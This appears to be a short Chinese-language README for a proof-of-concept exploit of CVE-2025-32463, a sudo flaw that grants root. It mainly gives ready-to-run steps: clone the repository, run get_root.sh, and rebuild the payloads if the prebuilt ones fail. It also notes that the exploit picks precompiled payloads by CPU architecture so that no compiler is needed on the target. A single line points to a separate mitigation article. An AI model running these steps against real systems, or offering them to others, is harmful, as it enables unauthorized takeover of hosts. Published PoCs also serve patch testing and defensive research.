通过 sudo 实现权限提升至 root,无需在目标上安装 gcc。
由 Rich Mirch 发现。
我写了一篇文章解释攻击缓解措施:Ubuntu Unattended-Upgrades
# get_root.sh 和 get_root.py 功能相同。
git clone https://github.com/MohamedKarrab/CVE-2025-32463.git
cd CVE-2025-32463
./get_root.sh
目标机器上无需安装 gcc。该 PoC 通过检测当前架构(例如 x86_64、aarch64),然后执行对应的动态预编译载荷。如果执行失败,则回退到静态载荷。
如果在您的机器上漏洞利用失败,您仍然可以通过以下方式编译:
./mkall-dynamic.sh
# 然后运行
./get_root.sh
但此时您显然需要编译器。